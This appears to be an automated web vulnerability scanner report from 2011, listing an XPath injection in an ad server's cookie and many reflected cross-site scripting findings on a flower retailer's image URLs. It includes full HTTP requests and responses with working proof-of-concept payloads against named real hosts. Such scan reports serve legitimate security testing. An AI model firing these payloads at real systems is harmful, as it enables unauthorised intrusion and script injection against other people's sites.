   var scart_unloadPopup_override = false;

   var isIE = (navigator.appName.indexOf("Microsoft") != -1);
   var isNav = (navigator.appName.indexOf("Netscape") != -1);
   var isFirefox = (navigator.userAgent.indexOf("Firefox") != -1);

   function unloadPopup(ev) {

/* If we are coming from the empty shopcart page. Thus, if our cart is empty.
           // Then don't show any popups.
           */

        if (scart_unloadPopup_override) {
            return 0;
           }

           var range = screen.height - document.body.offsetHeight;
           if (isIE) {
               ev = window.event;
           }

// kludge
if(!ev
...[SNIP]...

3. XPath injection

Summary

Severity:   High
Confidence:   Firm
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The NETID01 cookie appears to be vulnerable to XPath injection attacks. The payload ',0)waitfor%20delay'0%3a0%3a20'-- was submitted in the NETID01 cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alphanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.

Request

GET /adserver/ako?activate&type=gif&csid=K10145 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305606&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2',0)waitfor%20delay'0%3a0%3a20'--; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=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; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsiPus_aQJL="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"; rsi_us_1000000="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"; rsi_segs_1000000=pUPF5ENBeXIMpzax3xDh/u74svh4rycdP0dAKlgosDQtsveKPUAbV6eJooUUZKyvzikWhXHnKlCMkZbB9/VH60YJGPxFnajuGncuM/dM/Uh51xPHRNkiKQlkFzeExmUiyCHp+JZor9oPRzZI0Mbu6KYqeA1IFSCpVac+IHlYHQGyWu5ISmDl59BKT6swEf9AkfwNDDGhkWPwbnVyhZyB1WbtdCNOgL1rLo31JmKhop80U9r9+w7gbPBUqdi6+aNOCntxXGEa0lT+AOh+9OmV2I5Yi+DkYM3YMd3xb2omk+SKbfwlcWpm1VDYZX6/5kh5fJXyQ0UuyTsjW0JuXe81b8+eIYhrcWsU5BhKZRNIMTtdY+xejMckEvxn9o2P/m3ieDJIm0I9cQrZSZNRQDVHBMxU2xxjy5ZGBdqmuzGNq9UM71skeHbQ22x5ql389tzqH5qIR0+2BtDJC3TVoXS7O5QjXrolunrjwuyTfiDVLYSK9FFxIlC9z+BchyFW97A0vl9EZfAu44kUi3twGM/yf01GWw==; 
rtc_0s-X=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

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_aQJL=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_aQJL=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_s48j="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1274605&id=56918&id=315889&id=715901&id=1023315&id=725071&id=1268392&id=1198035&id=1049794&id=74560&id=593881&id=1264419&id=86237&id=926097&id=1006089&id=1196051&id=1086731&id=1284585&id=1086733&id=1044410&id=1093100&id=1063912&id=397181&id=1044578&id=1063916&id=1041270&id=1049769&id=1049770&id=596293&id=576685&id=596291&id=1044587&id=1049772&id=1063911&id=1063910&t=2
Content-Length: 0
Date: Mon, 09 May 2011 01:04:19 GMT


4. Cross-site scripting (reflected)
There are 212 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


4.1. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/8inwoodtaper_tn [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/8inwoodtaper_tn

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 1fc4e<img%20src%3da%20onerror%3dalert(1)>27c92c8ec6c was submitted in the REST URL parameter 9. This input was echoed as 1fc4e<img src=a onerror=alert(1)>27c92c8ec6c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/8inwoodtaper_tn1fc4e<img%20src%3da%20onerror%3dalert(1)>27c92c8ec6c?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&hei=73 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 91
Cache-Control: no-store
Date: Mon, 09 May 2011 12:12:33 GMT
Connection: close

Unable to find /ProvideCommerce/8inwoodtaper_tn1fc4e<img src=a onerror=alert(1)>27c92c8ec6c

4.2. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/8inwvnbskt_tn [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/8inwvnbskt_tn

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload e86fb<img%20src%3da%20onerror%3dalert(1)>9d7791613a7 was submitted in the REST URL parameter 9. This input was echoed as e86fb<img src=a onerror=alert(1)>9d7791613a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/8inwvnbskt_tne86fb<img%20src%3da%20onerror%3dalert(1)>9d7791613a7?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&hei=73 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: no-store
Date: Mon, 09 May 2011 12:12:32 GMT
Connection: close

Unable to find /ProvideCommerce/8inwvnbskt_tne86fb<img src=a onerror=alert(1)>9d7791613a7

4.3. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ACC_purpletrumpet_VA0211_11_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ACC_purpletrumpet_VA0211_11_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 532b2<img%20src%3da%20onerror%3dalert(1)>e8b79cc0d7f was submitted in the REST URL parameter 9. This input was echoed as 532b2<img src=a onerror=alert(1)>e8b79cc0d7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ACC_purpletrumpet_VA0211_11_SQ532b2<img%20src%3da%20onerror%3dalert(1)>e8b79cc0d7f?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&hei=73 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Mon, 09 May 2011 12:09:28 GMT
Connection: close

Unable to find /ProvideCommerce/ACC_purpletrumpet_VA0211_11_SQ532b2<img src=a onerror=alert(1)>e8b79cc0d7f

4.4. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers09_3months_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers09_3months_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload dc0ce<img%20src%3da%20onerror%3dalert(1)>2e0a0929579 was submitted in the REST URL parameter 9. This input was echoed as dc0ce<img src=a onerror=alert(1)>2e0a0929579 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers09_3months_PFdc0ce<img%20src%3da%20onerror%3dalert(1)>2e0a0929579?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 99
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:14 GMT
Connection: close

Unable to find /ProvideCommerce/BBMflowers09_3months_PFdc0ce<img src=a onerror=alert(1)>2e0a0929579

4.5. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers09_6months_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers09_6months_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 3cd85<img%20src%3da%20onerror%3dalert(1)>293739f3d19 was submitted in the REST URL parameter 9. This input was echoed as 3cd85<img src=a onerror=alert(1)>293739f3d19 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers09_6months_PF3cd85<img%20src%3da%20onerror%3dalert(1)>293739f3d19?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 99
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:14 GMT
Connection: close

Unable to find /ProvideCommerce/BBMflowers09_6months_PF3cd85<img src=a onerror=alert(1)>293739f3d19

4.6. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers_12monthsXMAS_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers_12monthsXMAS_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 6e79d<img%20src%3da%20onerror%3dalert(1)>461165d53fe was submitted in the REST URL parameter 9. This input was echoed as 6e79d<img src=a onerror=alert(1)>461165d53fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers_12monthsXMAS_PF6e79d<img%20src%3da%20onerror%3dalert(1)>461165d53fe?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 102
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:17 GMT
Connection: close

Unable to find /ProvideCommerce/BBMflowers_12monthsXMAS_PF6e79d<img src=a onerror=alert(1)>461165d53fe

4.7. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_12months_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_12months_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 8c050<img%20src%3da%20onerror%3dalert(1)>d2aadd692a9 was submitted in the REST URL parameter 9. This input was echoed as 8c050<img src=a onerror=alert(1)>d2aadd692a9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_12months_PF8c050<img%20src%3da%20onerror%3dalert(1)>d2aadd692a9?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 99
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:04 GMT
Connection: close

Unable to find /ProvideCommerce/BBMplants09_12months_PF8c050<img src=a onerror=alert(1)>d2aadd692a9

4.8. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_3months_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_3months_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 219a4<img%20src%3da%20onerror%3dalert(1)>731292b4127 was submitted in the REST URL parameter 9. This input was echoed as 219a4<img src=a onerror=alert(1)>731292b4127 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_3months_PF219a4<img%20src%3da%20onerror%3dalert(1)>731292b4127?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 98
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:08 GMT
Connection: close

Unable to find /ProvideCommerce/BBMplants09_3months_PF219a4<img src=a onerror=alert(1)>731292b4127

4.9. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_6months_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_6months_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 42d6c<img%20src%3da%20onerror%3dalert(1)>7a0481f0a6 was submitted in the REST URL parameter 9. This input was echoed as 42d6c<img src=a onerror=alert(1)>7a0481f0a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_6months_PF42d6c<img%20src%3da%20onerror%3dalert(1)>7a0481f0a6?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 97
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:07 GMT
Connection: close

Unable to find /ProvideCommerce/BBMplants09_6months_PF42d6c<img src=a onerror=alert(1)>7a0481f0a6

4.10. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLB6indaffodills_nestbskt10_2_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLB6indaffodills_nestbskt10_2_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload efcc5<img%20src%3da%20onerror%3dalert(1)>06385eca2 was submitted in the REST URL parameter 9. This input was echoed as efcc5<img src=a onerror=alert(1)>06385eca2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLB6indaffodills_nestbskt10_2_PFefcc5<img%20src%3da%20onerror%3dalert(1)>06385eca2?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:58 GMT
Connection: close

Unable to find /ProvideCommerce/BLB6indaffodills_nestbskt10_2_PFefcc5<img src=a onerror=alert(1)>06385eca2

4.11. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLB7ineastergarden_yelwatercan09_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLB7ineastergarden_yelwatercan09_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 98f67<img%20src%3da%20onerror%3dalert(1)>58f8ed190d0 was submitted in the REST URL parameter 9. This input was echoed as 98f67<img src=a onerror=alert(1)>58f8ed190d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLB7ineastergarden_yelwatercan09_PF98f67<img%20src%3da%20onerror%3dalert(1)>58f8ed190d0?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 111
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:12 GMT
Connection: close

Unable to find /ProvideCommerce/BLB7ineastergarden_yelwatercan09_PF98f67<img src=a onerror=alert(1)>58f8ed190d0

4.12. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLB7inhollmix_honeywvn09_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLB7inhollmix_honeywvn09_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 48187<img%20src%3da%20onerror%3dalert(1)>f3fd15c3de9 was submitted in the REST URL parameter 9. This input was echoed as 48187<img src=a onerror=alert(1)>f3fd15c3de9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLB7inhollmix_honeywvn09_PF48187<img%20src%3da%20onerror%3dalert(1)>f3fd15c3de9?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
